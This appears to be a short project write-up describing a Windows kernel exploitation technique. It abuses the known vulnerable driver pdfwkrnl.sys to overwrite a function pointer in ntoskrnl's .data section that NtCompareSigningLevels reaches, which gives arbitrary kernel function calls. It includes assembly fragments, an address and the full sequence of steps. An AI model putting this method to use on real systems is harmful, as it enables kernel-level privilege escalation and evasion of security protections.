I saw this driver on loldrivers.io and thought nothing of it at first but then i realized all we need is vulnerable memcpy to copy kernel to call kernel functions.
After remembering how a basic data pointer swap hook work's i found one in ntoskrnl.exe called "NtCompareSigningLevels" and this was perfect for exploiting.
sub rsp, 28h
mov r8, cs:function_pointer
boom! that's the big ol bug, it loads a pointer from a variable inside ntoskrnl's .data section which can be easily modified to any kernel function which is a big no no.
.data:0000000140C1DA00 function_pointer // ntoskrnl.exe
I wrote a simple library for pdfwkrnl.sys after taking a little code from another project (https://github.com/Legcsnaec/driverMapper) "Originally forked from ia-32-Sudo's project, his account is deleted or terminated". Then the exploit time i decided to use an offset for the function_pointer then i used EnumDeviceDrivers to get ntoskrnl's base then used the driver to walk the ntoskrnl's pe headers for exports then we got our export address then wrote over the function_pointer to our selected export then called the user-mode component NtCompareSigningLevels (exported by ntdll.dll) while passing our custom then after execution we swapped back the old pointer as nothing had happened.
This was cool as i racked my brain for this cool little project it took around 5 hours.
this only work's for windows 10 22h2 but this method can appiled to any function inside ntoskrnl or win32k drivers.
a ntstatus of STATUS_INVALID_IMAGE_HASH or 0xC0000428 will always be returned as NtCompareSigningLevels always returns it if returned value by the called function is not equal then 0.
all i ask for is credits for my idea, thanks for the small read feel free to leave a follow or fork to show your support.
good bye and have a great day (: